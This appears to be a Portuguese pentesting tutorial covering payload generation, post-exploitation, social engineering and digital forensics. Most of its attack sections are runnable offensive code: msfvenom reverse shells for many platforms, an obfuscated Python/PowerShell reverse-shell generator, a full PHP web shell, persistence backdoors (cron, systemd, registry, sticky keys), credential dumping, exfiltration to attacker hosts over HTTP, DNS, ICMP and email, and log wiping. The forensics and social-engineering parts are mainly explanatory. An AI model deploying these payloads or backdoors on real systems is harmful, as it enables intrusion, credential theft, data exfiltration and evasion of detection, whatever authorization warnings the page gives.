Execução direta na memória

🛠️ Ferramentas de Geração

Metasploit Framework:
  • • msfvenom - Payload generator
  • • msfconsole - Interactive console
  • • Custom encoders/modules
  • • Multi-stage payloads
  • • Platform-specific generation
Custom Generators:
  • • PayloadsAllTheThings
  • • RevShells.com
  • • Custom Python/Bash scripts
  • • PowerShell generators
  • • Cross-platform builders
Evasion Tools:
  • • Veil Framework
  • • Shellter (PE infection)
  • • TheFatRat
  • • Custom obfuscators
  • • Anti-sandbox techniques

MSFVenom - Payload Generation Masterclass

🐧 Linux Reverse Shells

# Instalar Metasploit no Termux
pkg install unstable-repo
pkg install metasploit

# Basic Linux reverse shell
msfvenom -p linux/x86/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f elf > shell.elf

# Linux meterpreter (staged)
msfvenom -p linux/x86/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f elf > meterpreter.elf

# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp \
  LPORT=4444 -f elf > bindshell.elf

# Encoded payload (evade AV)
msfvenom -p linux/x86/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 \
  -e x86/shikata_ga_nai -i 3 -f elf > encoded.elf

🪟 Windows Payloads

# Windows reverse shell (exe)
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe > shell.exe

# Windows meterpreter
msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe > meterpreter.exe

# Windows service payload
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f exe-service > service.exe

# DLL payload
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f dll > shell.dll

# PowerShell one-liner
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f psh-cmd

🌐 Web Payloads

# PHP web shell
msfvenom -p php/reverse_php \
  LHOST=192.168.1.100 LPORT=4444 -f raw > shell.php

# JSP payload  
msfvenom -p java/jsp_shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f raw > shell.jsp

# ASP payload
msfvenom -p windows/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f asp > shell.asp

# Python payload
msfvenom -p python/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f raw > shell.py

# Bash one-liner
msfvenom -p cmd/unix/reverse_bash \
  LHOST=192.168.1.100 LPORT=4444 -f raw

📱 Mobile & Multi-Platform

# Android APK
msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -o payload.apk

# macOS payload
msfvenom -p osx/x86/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f macho > shell.macho

# Java payload (cross-platform)
msfvenom -p java/shell_reverse_tcp \
  LHOST=192.168.1.100 LPORT=4444 -f jar > shell.jar

# Multi-handler setup
echo "use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp  
set LHOST 192.168.1.100
set LPORT 4444
exploit" > handler.rc

msfconsole -r handler.rc

Desenvolvimento de Payloads Customizados

🐍 Python Reverse Shell Generator

#!/usr/bin/env python3
"""
Custom Python Reverse Shell Generator
Gera shells personalizados com evasão básica
"""
import base64
import sys

def generate_python_shell(lhost, lport, obfuscate=True):
    basic_shell = f'''
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost}",{lport}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
'''
    
    if obfuscate:
        # Base64 encode
        encoded = base64.b64encode(basic_shell.encode()).decode()
        obfuscated = f'''
import base64,sys
exec(base64.b64decode("{encoded}").decode())
'''
        return obfuscated
    
    return basic_shell

def generate_powershell_shell(lhost, lport):
    ps_shell = f'''
$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{{0}};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
    $stream.Write($sendbyte,0,$sendbyte.Length);
    $stream.Flush()
}};
$client.Close()
'''
    
    # Encode for evasion
    encoded_bytes = [str(ord(char)) for char in ps_shell]
    encoded_cmd = f"[char[]]({','.join(encoded_bytes)}) -join ''"
    
    return f"powershell -nop -w hidden -e " + base64.b64encode(f"IEX({encoded_cmd})".encode('utf-16le')).decode()

# Exemplo de uso
if __name__ == "__main__":
    lhost = "192.168.1.100"
    lport = "4444"
    
    print("=== Python Reverse Shell ===")
    print(generate_python_shell(lhost, lport))
    
    print("\n=== PowerShell Reverse Shell ===")
    print(generate_powershell_shell(lhost, lport))

🌐 Advanced Web Shell Generator

<?php
/**
 * Advanced PHP Web Shell
 * Features: Command execution, file upload, download, basic evasion
 */

// Basic authentication (change password!)
$password = "pentesting123";
session_start();

if (!isset($_SESSION['authenticated'])) {
    if (isset($_POST['pwd']) && $_POST['pwd'] == $password) {
        $_SESSION['authenticated'] = true;
    } else {
        echo '<form method="post"><input type="password" name="pwd" placeholder="Password"><input type="submit"></form>';
        exit;
    }
}

echo "<h2>Web Shell - Current Directory: " . getcwd() . "</h2>";

// Command execution
if (isset($_POST['cmd'])) {
    $cmd = $_POST['cmd'];
    echo "<pre>";
    
    // Multiple execution methods for better compatibility
    if (function_exists('system')) {
        system($cmd);
    } elseif (function_exists('shell_exec')) {
        echo shell_exec($cmd);
    } elseif (function_exists('exec')) {
        exec($cmd, $output);
        echo implode("\n", $output);
    } elseif (function_exists('passthru')) {
        passthru($cmd);
    } else {
        echo "No execution functions available!";
    }
    
    echo "</pre>";
}

// File upload functionality
if (isset($_FILES['file'])) {
    $target = $_FILES['file']['name'];
    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "<p>File uploaded: $target</p>";
    }
}

// Simple file browser
echo "<h3>Files in current directory:</h3>";
$files = scandir('.');
foreach ($files as $file) {
    if ($file != '.' && $file != '..') {
        echo "<a href='?download=$file'>$file</a> | ";
        echo "<a href='?delete=$file' onclick='return confirm(\"Delete $file?\")'>[DEL]</a><br>";
    }
}

// Download functionality
if (isset($_GET['download'])) {
    $file = $_GET['download'];
    if (file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . $file . '"');
        readfile($file);
        exit;
    }
}

// Delete functionality
if (isset($_GET['delete'])) {
    $file = $_GET['delete'];
    if (unlink($file)) {
        echo "<p>Deleted: $file</p>";
    }
}
?>

<!-- Interface -->
<form method="post">
    <input type="text" name="cmd" placeholder="Command" size="50">
    <input type="submit" value="Execute">
</form>

<form method="post" enctype="multipart/form-data">
    <input type="file" name="file">
    <input type="submit" value="Upload">
</form>

🔒 Payload Obfuscation Techniques

#!/bin/bash
# Advanced Payload Obfuscation Script

# 1. Base64 Encoding (multiple layers)
echo "nc -e /bin/bash 192.168.1.100 4444" | base64 | base64

# 2. Hex Encoding
echo "nc -e /bin/bash 192.168.1.100 4444" | xxd -p | tr -d '\n'

# 3. Character substitution
original="nc -e /bin/bash 192.168.1.100 4444"
obfuscated=$(echo "$original" | sed 's/n/\\156/g; s/c/\\143/g')

# 4. Environment variable hiding
export H="192.168.1.100"
export P="4444" 
export C="nc -e /bin/bash"
eval "$C $H $P"

# 5. Function-based obfuscation
function x() { nc -e /bin/bash $1 $2; }
x 192.168.1.100 4444

# 6. PowerShell obfuscation techniques
# Character replacement
$cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')"
$obf = $cmd -replace 'I','[char]73' -replace 'E','[char]69' -replace 'X','[char]88'

# Variable substitution  
$h='192.168.1.100'
$p='shell.ps1'
$url="http://$h/$p"
IEX(New-Object Net.WebClient).DownloadString($url)

🧪 Teste e Validação de Payloads

✅ Checklist de Teste:
  • • Testar payload em ambiente isolado
  • • Verificar compatibilidade com target OS
  • • Validar conectividade de rede
  • • Testar evasão de AV/EDR
  • • Verificar estabilidade da conexão
  • • Documentar funcionalidades
  • • Preparar handlers apropriados
⚠️ Considerações de Segurança:
  • • Nunca usar em sistemas de produção
  • • Sempre obter autorização por escrito
  • • Usar apenas em labs controlados
  • • Não deixar backdoors permanentes
  • • Limpar artefatos após teste
  • • Seguir responsible disclosure
  • • Manter logs de atividades

Post-Exploitation

Técnicas Avançadas Pós-Comprometimento para Testes de Penetração

🚨 AVISO EXTREMAMENTE CRÍTICO

Post-Exploitation é EXCLUSIVO para pentesting autorizado! Estas técnicas simulam ataques reais de APT e devem ser usadas apenas em ambientes controlados.

USO NÃO AUTORIZADO = CRIME HEDIONDO com penas severas. Sempre tenha autorização escrita, escopo definido e ambiente isolado.

Fases da Post-Exploitation

1. Stabilize

Estabilizar acesso

2. Enumerate

Enumerar sistema

3. Escalate

Elevar privilégios

4. Persist

Manter acesso

5. Pivot

Movimento lateral

6. Exfiltrate

Extrair dados

🎯 Kill Chain Pós-Comprometimento

🔥 Immediate Actions:
  • • Upgrade to interactive shell
  • • Establish persistence
  • • Basic system enumeration
  • • Check user privileges
  • • Identify OS and architecture
🕵️ Discovery Phase:
  • • Network reconnaissance
  • • User and group enumeration
  • • Process and service analysis
  • • File system exploration
  • • Application inventory
🎯 Advanced Objectives:
  • • Domain enumeration
  • • Credential harvesting
  • • Lateral movement
  • • Data exfiltration
  • • Long-term persistence

Enumeração Sistemática Pós-Comprometimento

🐧 Linux Post-Exploitation Enumeration

#!/bin/bash
# Linux Post-Exploitation Enumeration Script

echo "=== SYSTEM INFORMATION ==="
hostname
uname -a
cat /etc/os-release
uptime
id
groups

echo -e "\n=== NETWORK CONFIGURATION ==="
ifconfig -a || ip addr show
netstat -tulpn 2>/dev/null || ss -tulpn
cat /etc/resolv.conf
arp -a 2>/dev/null || ip neigh

echo -e "\n=== USER ENUMERATION ==="
cat /etc/passwd | grep -v nologin
cat /etc/group
w
last -n 10
cat /home/*/.bash_history 2>/dev/null | head -50

echo -e "\n=== PRIVILEGE ESCALATION VECTORS ==="
sudo -l 2>/dev/null
find / -perm -4000 2>/dev/null | head -20
find / -perm -2000 2>/dev/null | head -20
getcap -r / 2>/dev/null | head -10

echo -e "\n=== SERVICES AND PROCESSES ==="
ps aux | head -20
systemctl list-units --type=service --state=running 2>/dev/null || service --status-all 2>/dev/null
crontab -l 2>/dev/null
cat /etc/crontab 2>/dev/null

echo -e "\n=== INTERESTING FILES ==="
find /home -name "*.txt" -o -name "*.pdf" -o -name "*.doc*" 2>/dev/null | head -10
find / -name "*password*" -o -name "*secret*" -o -name "*key*" 2>/dev/null | head -10
ls -la /tmp /var/tmp /dev/shm 2>/dev/null

🪟 Windows Post-Exploitation Enumeration

@echo off
REM Windows Post-Exploitation Enumeration

echo === SYSTEM INFORMATION ===
systeminfo
hostname
whoami
whoami /priv
whoami /groups

echo.
echo === NETWORK CONFIGURATION ===
ipconfig /all
netstat -ano
route print
arp -a

echo.
echo === USER ENUMERATION ===
net user
net localgroup
net localgroup administrators
query user
cmdkey /list

echo.
echo === PRIVILEGE ESCALATION VECTORS ===
icacls "C:\Program Files" | findstr Everyone
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
wmic service get name,displayname,pathname,startmode | findstr /i "auto"

echo.
echo === PROCESSES AND SERVICES ===
tasklist /svc
wmic process get processid,parentprocessid,name,commandline
sc query state= all
schtasks /query /fo LIST /v

echo.
echo === INTERESTING FILES AND REGISTRY ===
dir /s C:\*password* 2>nul | findstr File
dir /s C:\*secret* 2>nul | findstr File
reg query HKLM /f password /t REG_SZ /s 2>nul | findstr /i password
reg query HKCU /f password /t REG_SZ /s 2>nul | findstr /i password

Técnicas de Escalação de Privilégios

🔓 Linux Privilege Escalation

Common Vectors:
# SUID/SGID Binaries
find / -perm -4000 2>/dev/null
find / -perm -2000 2>/dev/null

# Sudo privileges
sudo -l

# Capabilities
getcap -r / 2>/dev/null

# Writable /etc/passwd
ls -la /etc/passwd

# Cron jobs
crontab -l
cat /etc/crontab
ls -la /etc/cron*

# World-writable files
find / -perm -2 -type f 2>/dev/null

# Kernel exploits
uname -a
cat /proc/version
Automated Tools:
# LinPEAS (Linux Privilege Escalation Awesome Script)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

# LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh

# Linux Exploit Suggester  
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh

# GTFO Bins
# Check https://gtfobins.github.io/
# Example: vim privilege escalation
sudo vim -c ':!/bin/sh'

🪟 Windows Privilege Escalation

Common Techniques:
# Unquoted Service Paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

# Service permissions
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

# Registry AutoRun
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# Scheduled Tasks  
schtasks /query /fo LIST /v | findstr /i taskname

# DLL Hijacking opportunities
for /f %i in ('dir /b C:\windows\system32\*.*') do echo %i
PowerShell Tools:
# PowerUp (PowerSploit)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1')
Invoke-AllChecks

# WinPEAS  
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')

# Sherlock (Watson)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
Find-AllVulns

# JAWS (Just Another Windows Enum Script)
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1')

Técnicas de Persistência

🐧 Linux Persistence

# SSH Key Persistence
mkdir -p ~/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2E... attacker@kali" >> ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys

# Cron Job Persistence
(crontab -l ; echo "*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'") | crontab -

# Bashrc Persistence
echo "nohup bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1' &" >> ~/.bashrc

# Service Persistence (systemd)
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
After=network.target

[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'
Restart=always
User=root

[Install]
WantedBy=multi-user.target
EOF

systemctl enable backdoor.service
systemctl start backdoor.service

# Binary Replacement
cp /bin/nc /tmp/original_nc
echo '#!/bin/bash
/tmp/original_nc "$@"
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1 &
' > /bin/nc

# SUID Backdoor
cp /bin/bash /tmp/rootbash
chmod +s /tmp/rootbash

🪟 Windows Persistence

REM Registry Run Keys
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\Windows\System32\backdoor.exe"

REM Scheduled Task Persistence
schtasks /create /sc minute /mo 10 /tn "Windows Update Check" /tr "powershell -WindowStyle Hidden -Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')\""

REM Service Persistence
sc create Backdoor binpath= "cmd /c powershell -WindowStyle Hidden -Command \"IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/shell.ps1')\""
sc config Backdoor start= auto

REM WMI Event Subscription
wmic /namespace:"\\root\subscription" path __EventFilter create Name="Backdoor", EventNameSpace="root\cimv2", QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfRawData_PerfOS_System'"

REM Sticky Keys Backdoor
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

REM DLL Hijacking
copy backdoor.dll "C:\Program Files\Application\hijackable.dll"

Movimento Lateral e Pivoting

🌐 Network Pivoting Techniques

# SSH Tunneling
ssh -L 8080:internal-server:80 user@compromised-host
ssh -D 9050 user@compromised-host  # SOCKS proxy

# Chisel (HTTP tunneling)
# On attacker machine
./chisel server -p 8000 --reverse

# On compromised machine  
./chisel client attacker-ip:8000 R:9001:internal-target:3389

# Netsh Port Forwarding (Windows)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=internal-server

# Socat Pivoting
socat TCP-LISTEN:8080,fork TCP:internal-server:80

# Meterpreter Pivoting
# In meterpreter session
run autoroute -s 192.168.1.0/24
use auxiliary/server/socks_proxy
set SRVPORT 9050
run

# Proxychains configuration
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf
proxychains nmap -sT 192.168.1.0/24

🎯 Credential Harvesting

# Mimikatz (Windows)
privilege::debug
sekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
lsadump::sam
lsadump::secrets

# LaZagne (Multi-platform)
python laZagne.py all

# Linux credential harvesting
cat /etc/shadow
cat /etc/passwd
grep -r "password" /etc/
find /home -name "*.ssh" 2>/dev/null
cat ~/.bash_history | grep -E "(ssh|scp|mysql|ftp)" | head -10

# Browser credential extraction
# Chrome passwords (Linux)
find ~/.config/google-chrome/Default -name "Login Data" 2>/dev/null

# Firefox passwords (Linux)  
find ~/.mozilla/firefox -name "*.default*" 2>/dev/null

# Memory dump analysis
strings /proc/[PID]/mem | grep -E "(password|pass|pwd)"

# Network credential sniffing
tcpdump -i any -s 0 -A 'port 21 or port 23 or port 110 or port 143'

Técnicas de Exfiltração de Dados

📤 Exfiltração via HTTP/DNS

# HTTP POST exfiltration
curl -X POST -F "data=@/etc/passwd" http://attacker-server/upload

# Base64 encoded HTTP exfiltration
cat sensitive_file | base64 | curl -X POST -d @- http://attacker-server/data

# DNS exfiltration
for line in $(cat /etc/passwd | base64 -w0 | fold -w50); do
    nslookup $line.attacker-domain.com
done

# ICMP exfiltration
cat secret.txt | base64 | while read line; do
    ping -c 1 -p $(echo $line | xxd -p | tr -d '\n') attacker-ip
done

# PowerShell HTTP exfiltration (Windows)
$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\sensitive.txt"))
Invoke-WebRequest -Uri "http://attacker-server/upload" -Method POST -Body $data

# Email exfiltration
tar czf - /home/user/documents | base64 | mail -s "Backup" attacker@gmail.com

🔒 Steganography & Covert Channels

# Steganography with images
steghide embed -cf cover.jpg -ef secret.txt -sf output.jpg

# Hide data in whitespace
# Create file with hidden data in spaces/tabs
echo -e "Normal text\t\t  \tHidden data in whitespace"

# Social media exfiltration
# Post data as image comments on public posts
convert -size 800x600 -background black -fill white -pointsize 12 \
        text:"$(base64 sensitive.txt)" output.png

# Git exfiltration (if git access available)
git init /tmp/exfil
cp sensitive_files /tmp/exfil/
cd /tmp/exfil
git add .
git commit -m "Normal commit"
git remote add origin https://github.com/attacker/innocent-repo
git push origin main

# Cloud storage exfiltration
rclone copy sensitive_data remote:backup/

# Cryptocurrency blockchain exfiltration  
# Encode data in Bitcoin transactions (OP_RETURN)
bitcoin-cli sendmany "" '{}' 0 "" "$(echo "secret data" | base64)"

🧹 Anti-Forensics e Limpeza de Artefatos

🗑️ Limpeza de Logs:
# Linux log cleanup
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
history -c
unset HISTFILE

# Windows event log cleanup  
wevtutil cl System
wevtutil cl Security  
wevtutil cl Application
⚠️ Considerações Éticas:
  • • Documentar todas as ações realizadas
  • • Manter logs detalhados do teste
  • • Restaurar sistema ao estado original
  • • Remover todas as backdoors instaladas
  • • Entregar relatório completo ao cliente
  • • Seguir scope agreement rigorosamente

Social Engineering

A Arte da Manipulação Humana: Entenda Para Se Defender

⚠️ AVISO IMPORTANTE

Social Engineering é para DEFESA, não para ataque! Este conteúdo é estritamente educacional para que você possa identificar e se proteger contra essas técnicas.

Usar essas técnicas contra terceiros sem autorização é CRIME e pode resultar em processo criminal e civil. Use apenas em ambientes autorizados de teste.

Fundamentos da Engenharia Social

Observação

Coleta de informações sobre o alvo

Rapport

Estabelecer confiança e conexão

Manipulação

Explorar princípios psicológicos

Exploração

Obter informações ou acesso

🧠 Princípios Psicológicos Explorados

Gatilhos Mentais:
  • Autoridade: Pessoas obedecem figuras de autoridade
  • Urgência: Pressão temporal reduz pensamento crítico
  • Reciprocidade: Obrigação de retribuir favores
  • Escassez: Valor aumenta com raridade
Vieses Cognitivos:
  • Confirmação: Buscar informações que confirmem crenças
  • Halo Effect: Uma característica influencia percepção geral
  • Ancoragem: Primeira informação influencia decisões
  • Prova Social: Seguir comportamento do grupo

Vetores de Ataque Comuns (Para Conhecer e Defender)

📧 Phishing e Pretexting

Técnica: Emails falsos de autoridades
Objetivo: Obter credenciais ou informações
Defesa: Verificar remetente, não clicar em links suspeitos

📞 Vishing (Voice Phishing)

Técnica: Ligações falsas de bancos/empresas
Objetivo: Extrair dados pessoais por telefone
Defesa: Nunca fornecer dados por telefone, ligar de volta

💬 Smishing (SMS Phishing)

Técnica: SMS falsos com links maliciosos
Objetivo: Redirecionar para sites falsos
Defesa: Não clicar em links de SMS suspeitos

🏢 Tailgating/Piggybacking

Técnica: Seguir pessoas autorizadas
Objetivo: Acesso físico não autorizado
Defesa: Sempre verificar credenciais, não segurar portas

🎭 Baiting e Quid Pro Quo

Técnica: Oferecer algo em troca de informações
Objetivo: Trocar "favores" por dados sensíveis
Defesa: Desconfiar de ofertas "grátis" ou favores

💾 USB/Physical Drops

Técnica: Deixar dispositivos infectados
Objetivo: Explorar curiosidade humana
Defesa: Nunca conectar dispositivos desconhecidos

Estratégias de Defesa Corporativa

🎓 Treinamento de Conscientização

  • • Simulações de phishing controladas
  • • Workshops de segurança
  • • Testes periódicos
  • • Feedback construtivo
  • • Cultura de segurança

🔒 Controles Técnicos

  • • Filtros anti-spam/phishing
  • • Autenticação multifator
  • • Segmentação de rede
  • • Monitoramento de tráfego
  • • Sandboxing de emails

📋 Políticas e Processos

  • • Verificação de identidade
  • • Processo de validação
  • • Classificação de informações
  • • Incident response plan
  • • Auditoria regular

Testes de Engenharia Social Éticos

🧪 Framework de Testes Autorizados

Pré-requisitos Legais:
  • • Contrato de pentest assinado
  • • Escopo bem definido
  • • Autorização por escrito
  • • Rules of Engagement claras
  • • Plano de contingência
Metodologia Ética:
  • • Não causar danos reais
  • • Documentar tudo
  • • Relatório educativo
  • • Recomendações de melhoria
  • • Follow-up e suporte
# Ferramentas para Testes Autorizados de Social Engineering

# SET (Social Engineering Toolkit) - Apenas em ambiente controlado
git clone https://github.com/trustedsec/social-engineer-toolkit
cd social-engineer-toolkit
python setup.py install

# Gophish - Plataforma de simulação de phishing
# https://getgophish.com/
# Uso apenas para treinamentos autorizados

# King Phisher - Framework de phishing para testes
git clone https://github.com/securestate/king-phisher
# Configuração em ambiente isolado

# IMPORTANTE: Usar apenas em redes próprias ou autorizadas!

🛡️ Proteção Pessoal Contra Social Engineering

✅ Boas Práticas:
  • • Sempre verificar identidade antes de fornecer informações
  • • Desconfiar de urgência e pressão
  • • Validar solicitações por canal independente
  • • Manter informações pessoais privadas
  • • Educar família e amigos
  • • Reportar tentativas suspeitas
🚩 Sinais de Alerta:
  • • Pressão para agir rapidamente
  • • Solicitações incomuns de informações
  • • Ofertas "bom demais para ser verdade"
  • • Tentativas de estabelecer rapport forçado
  • • Inconsistências na história
  • • Pedidos para não verificar com outros

Digital Forensics

Investigação Digital e Análise Forense para Cibersegurança

⚖️ AVISO LEGAL E ÉTICO

Forense Digital requer AUTORIZAÇÃO LEGAL! Este conteúdo é para profissionais autorizados e educação. Investigações não autorizadas violam privacidade e leis.

Sempre seguir cadeia de custódia e procedimentos legais. Use apenas em equipamentos próprios, labs autorizados ou com ordem judicial válida.

Metodologia de Investigação Forense

1. Identify

Identificar evidências

2. Preserve

Preservar integridade

3. Collect

Coletar dados

4. Examine

Examinar evidências

5. Analyze

Analisar dados

6. Report

Gerar relatório

🔬 Princípios Fundamentais

📋 Cadeia de Custódia:
  • • Documentação detalhada
  • • Controle de acesso rigoroso
  • • Hash de integridade (MD5/SHA)
  • • Timeline de manipulação
  • • Assinatura de responsáveis
🛡️ Preservação de Dados:
  • • Imagem bit-a-bit (DD/E01)
  • • Write blockers físicos/software
  • • Duplicação forense
  • • Verificação de integridade
  • • Armazenamento seguro
⚖️ Aspectos Legais:
  • • Marco Civil da Internet
  • • LGPD compliance
  • • Código Penal - Art. 154-A
  • • Autorização judicial
  • • Admissibilidade probatória

Ferramentas e Técnicas Forenses

💿 Aquisição de Imagem Forense

# Instalar ferramentas forenses no Termux
pkg install ddrescue
pkg install testdisk
pkg install foremost
pkg install binwalk

# DD - Cópia bit-a-bit básica
dd if=/dev/sdb of=evidence.img bs=4096 conv=noerror,sync
# Calcular hash da imagem
md5sum evidence.img > evidence.md5
sha256sum evidence.img > evidence.sha256

# DDRescue - Para discos danificados
ddrescue /dev/sdb evidence.img evidence.log

# DC3DD - Versão forense aprimorada
dc3dd if=/dev/sdb of=evidence.img hash=md5 hash=sha256 log=acquisition.log

# Ewfacquire - Formato Expert Witness (E01)
ewfacquire /dev/sdb
# Especificar case number, evidence number, description

# Verificar integridade da imagem
ewfverify evidence.E01

# Mount de imagem forense (read-only)
mkdir /tmp/evidence
mount -o ro,loop evidence.img /tmp/evidence

🔍 Análise de Sistema de Arquivos

# The Sleuth Kit (TSK) - Análise de filesystem
# Listar partições
mmls evidence.img

# Analisar filesystem
fsstat -o 2048 evidence.img

# Listar arquivos (incluindo deletados)
fls -r -o 2048 evidence.img

# Recuperar arquivo específico por inode
icat -o 2048 evidence.img 1234 > recovered_file.txt

# Timeline de atividade do filesystem
fls -r -m / -o 2048 evidence.img > bodyfile.txt
mactime -b bodyfile.txt -d > timeline.csv

# Autopsy - Interface web para TSK
autopsy
# Acesse http://localhost:9999/autopsy

# TestDisk - Recuperação de partições
testdisk evidence.img

# PhotoRec - Recuperação de arquivos
photorec evidence.img

# Foremost - Carving de arquivos
foremost -i evidence.img -o recovered/

🔐 Análise de Memória RAM

# Volatility Framework - Análise de memória
# Dump de memória (Windows)
# Use DumpIt.exe, FTK Imager, ou Redline

# Identificar perfil do sistema
volatility -f memory.dmp imageinfo

# Listar processos ativos
volatility -f memory.dmp --profile=Win7SP1x64 pslist
volatility -f memory.dmp --profile=Win7SP1x64 psscan

# Dump de processo específico
volatility -f memory.dmp --profile=Win7SP1x64 procdump -p 1234 -D output/

# Conexões de rede
volatility -f memory.dmp --profile=Win7SP1x64 netscan

# Histórico de comandos
volatility -f memory.dmp --profile=Win7SP1x64 cmdscan
volatility -f memory.dmp --profile=Win7SP1x64 consoles

# Registry hives
volatility -f memory.dmp --profile=Win7SP1x64 hivelist
volatility -f memory.dmp --profile=Win7SP1x64 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"

# Malware detection
volatility -f memory.dmp --profile=Win7SP1x64 malfind
volatility -f memory.dmp --profile=Win7SP1x64 apihooks

📱 Forense Mobile

# ADB - Android Debug Bridge
adb devices
adb shell dumpsys
adb pull /data/data/com.android.providers.contacts/ contacts/
adb logcat > device_logs.txt

# Android Forensics with dd (root required)
adb shell su -c "dd if=/dev/block/userdata of=/sdcard/userdata.img"
adb pull /sdcard/userdata.img

# MSAB XRY Mobile Forensics (Commercial)
# Cellebrite UFED (Commercial)

# Santoku Linux - Mobile forensics distro
# Includes tools for iOS and Android

# iOS Forensics (jailbreak required)
# SSH into device
ssh root@iphone-ip
# Dump filesystem
tar -czf /tmp/ios_dump.tar.gz /

# WhatsApp Forensics
# Android: /data/data/com.whatsapp/databases/
# iOS: /private/var/mobile/Applications/WhatsApp/

# Telegram Forensics  
# Encrypted, requires specific tools
# Check cache and temporary files

# Browser forensics (mobile)
# Chrome: /data/data/com.android.chrome/
# Safari: /private/var/mobile/Applications/Safari/

Forense de Rede e Traffic Analysis

🌐 Captura e Análise de Tráfego

# Wireshark - Análise de protocolos
# GUI: wireshark
# CLI: tshark

# Captura básica com tcpdump
tcpdump -i eth0 -w capture.pcap

# Captura filtrada
tcpdump -i eth0 'host 192.168.1.100 and port 80' -w web_traffic.pcap

# Tshark - Análise em linha de comando
# Estatísticas básicas
tshark -r capture.pcap -q -z conv,ip
tshark -r capture.pcap -q -z http,tree

# Extrair objetos HTTP
tshark -r capture.pcap --export-objects http,extracted/

# Filtros úteis
tshark -r capture.pcap -Y "dns.qry.name contains malware"
tshark -r capture.pcap -Y "http.request.method == POST"
tshark -r capture.pcap -Y "ssl.handshake.certificate"

# NetworkMiner - Network forensic analysis
# GUI tool for Windows/Linux
# Automatically extracts files, images, certificates

# Zeek (Bro) - Network analysis framework
zeek -r capture.pcap local
# Generates multiple log files: conn.log, http.log, dns.log

# Análise de logs Zeek
cat conn.log | zeek-cut id.orig_h id.resp_h proto service
cat http.log | zeek-cut ts method host uri

